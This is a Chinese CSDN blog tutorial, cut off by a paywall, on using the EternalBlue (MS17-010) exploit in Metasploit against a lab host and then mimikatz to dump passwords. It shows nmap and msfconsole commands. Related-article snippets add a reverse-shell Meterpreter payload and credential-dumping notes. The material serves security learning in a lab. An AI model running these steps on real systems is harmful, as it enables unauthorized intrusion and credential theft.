详解新手如何利用ms17-010配合mimikatz获取目标主机账户密码

最新推荐文章于 2024-05-12 13:02:42 发布
最新推荐文章于 2024-05-12 13:02:42 发布
阅读量1.9k 收藏 12
点赞数 2
分类专栏: 渗透测试 文章标签: 渗透测试 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43573676/article/details/91355049
版权
本文详细介绍了新手如何通过ms17-010漏洞配合mimikatz工具,实现对目标主机的445端口扫描、权限获取、进程迁移及密码抓取的过程。首先使用Nmap扫描目标主机的开放端口,接着利用永恒之蓝漏洞获取靶机权限,并进行msf攻击机的配置。然后进行进程迁移,确保稳定性。最后,通过mimikatz模块获取靶机的密码哈希和明文密码。请注意,此类操作仅用于学习,禁止非法使用。
摘要由CSDN通过智能技术生成

第一步:使用Nmap扫描目标主机开放端口
要知道ms17010是对445端口进行攻击的,所以我们要先对目标机进行端口扫描

nmap 192.168.48.110

在这里插入图片描述
第二步:获取权限

在这里我们利用ms17010(永恒之蓝)漏洞来获取靶机的权限。
运行msf,使用ms17010漏洞。

msf5 > use exploit/windows/smb/ms17_010_eternalblue

在这里插入图片描述

接下来show options查看需要配置的参数

msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

在这里插入图片描述

剩下的就是需要我们设置LHOST、RHOST、payload,分别是攻击机IP、靶机IP、攻击载荷。

msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.48.1  //攻击机ip
lhost =&g
最低0.47元/天 解锁文章
1匹黑马
关注
  • 2
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码
weixin_48710435的博客
08-05 2638
一、实验环境: 1、攻击机:KaliIP:192.168.218.157 1)攻击工具:msf 2)分析工具:wireshark 2、靶 机:Windows7(旗舰版) IP:192.168.218.160 1)开启网络共享(SMB协议) 2)关闭防火墙 3、网卡连接方式:Vmnet8(NAT) 二、实验步骤: 1、测试攻击机与靶机的连通性 2.进行MS17-010漏洞扫描 1)启动msf 命令:msfconsole ...
详解利用ms17-010配合mimikatz获取目标主机账户密码
子曰小玖的博客
05-07 2141
第一步:使用Nmap扫描目标主机开放端口 要知道ms17010是对445端口进行攻击的,所以我们要先对目标机进行端口扫描 nmap 192.168.48.110 第二步:获取权限 在这里我们利用ms17010(永恒之蓝)漏洞来获取靶机的权限。 运行msf,使用ms17010漏洞。 msf5 > use exploit/windows/smb/ms17_010_eternalb...
MS17-010永恒之蓝-漏洞利用+修复方法
WEB渗透测试 从入门到萌新
04-21 8213
系列文章目录 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 系列文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的
2024年网络安全最全内网渗透神器(Mimikatz)——使用教程,2024年最新当上项目经理才知道
最新发布
2401_84267585的博客
05-12 1882
Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。
MS17010(永恒之蓝)漏洞复现
plant1234的博客
11-21 1万+
MS17010(永恒之蓝)漏洞利用与复现 首先需要准备win7的环境做为靶机 获取信息 利用nmap扫描得到,靶机IP nmap -sP 192.168.229.0/24 得到: IP:192.168.229.169 然后利用: nmap --script=vuln 192.168.229.169 得到靶机信息: 发现可能利用的漏洞: ms17-010 然后启动msf msfconsole 然后查找漏洞路径: search ms17-010 使用payload进行攻击: use exploit
NSA_ms17010漏洞扫描(自检,请勿应用在非法途径上)
07-27
NSA_ms17010漏洞扫描(自检,请勿应用在非法途径上)
MrWQ#vulnerability-paper#powershell + Invoke-Mimikatz-ps1 获取系统密码
07-25
(1)目标主机具备网络环境 (2)目标主机不具备网络环境 (3)把文件下载到目标主机进行执行
mimikatz获取系统密码
03-28
**mimikatz获取系统密码** 在网络安全领域,mimikatz是一款著名的工具,由法国安全研究员Benjamin Delpy开发。它主要用于提取操作系统中的敏感信息,如明文密码、NTLM哈希、kerberos票证等。mimikatz在渗透测试和...
获取Windows明文密码mimikatz2.2-x64.rar
03-19
标题 "获取Windows明文密码mimikatz2.2-x64.rar" 指向的是一个使用Mimikatz工具来提取Windows系统中明文密码的过程。Mimikatz是一款由法国安全研究员Benjamin Delpy开发的开源工具,主要用于系统安全分析,特别是...
mimikatz_trunk-1_mimikatz_
10-03
使用mimikatz时,需要注意的是,尽管它有合法的安全用途,但未经授权的密码获取可能触犯法律。因此,正确理解和使用mimikatz是非常重要的,必须在合法和道德的框架下进行操作。 总结来说,mimikatz是一个强大的工具...
mimikatz-master源码
07-22
mimikatz-master
MS17-010批量扫描器.zip
02-05
MS17-010批量扫描器,MS17-010,MS17-010漏洞利用工具。
MS17-010批量漏洞扫描工具
07-18
windows环境下可以批量检测ms17-010漏洞的脆弱性的小工具
MS17010(永恒之蓝)漏洞利用与复现
weixin_47640104的博客
05-27 6270
MS17010(永恒之蓝)漏洞利用与复现 0X00简介 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 0X01漏洞概述 永恒之蓝漏洞是方程式组织在其漏洞利用框架中
利用公网Msf+MS17010跨网段攻击内网(不详细立马关站)
热门推荐
大方子
08-24 1万+
前言 其实很多小白在对利用msf进行ms17010攻击的时候总是不成功,其实这都是因为网上大部分的文章都是写的内网对内网(192.168.1.2-->192.168.1.3)这样的案例,今天写了一下利用公网的MSF直接攻击其他服务器内网的案例。 准备工作 1.安装了Msf的公网主机+Ubuntu系统 2.一台其他服务器内网存在445漏洞 3.细心,细心,细心,钻研,钻研!!!...
MS17010漏洞利用总结
网络安全。
08-17 5191
0x01 常规打法 扫描是否存在ms17-010漏洞: nmap -n -p445 --script smb-vuln-ms17-010 192.168.1.0/24 --open MSF常规漏洞利用: msf > use exploit/windows/smb/ms17_010_eternalblue msf > set rhost 192.168.1.112 反向打: msf > set payload windows/x64/meterpreter/reverse_tcp m
ms17010漏洞复现-2003
aiquan9342的博客
04-29 566
先使用Smbtouch模块检测一下是否有漏洞。 然后使用Doublepulsar写一个shellcode到本地。 生成成功后的截图: 再使用EternalRomance植入Doublepulsar后门。 成功的截图: PS:仿佛是由于之前已经上传过bin的缘故,第二次测试的时候失败了。但是不影响后续操作。 都成功了以后该我们的Doublepulsar来反弹she...
一次授权任务的内网渗透 作者: 疯猫网络.pdf
04-08
作者注意到域控未打上KB3011780补丁,因此利用Mimikatz工具(一个强大的Windows安全工具集)和MS14-068漏洞exploit来获取域控的系统信息,包括清除内存中的Kerberos票据。 接下来,作者通过执行`whoami/all`命令...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值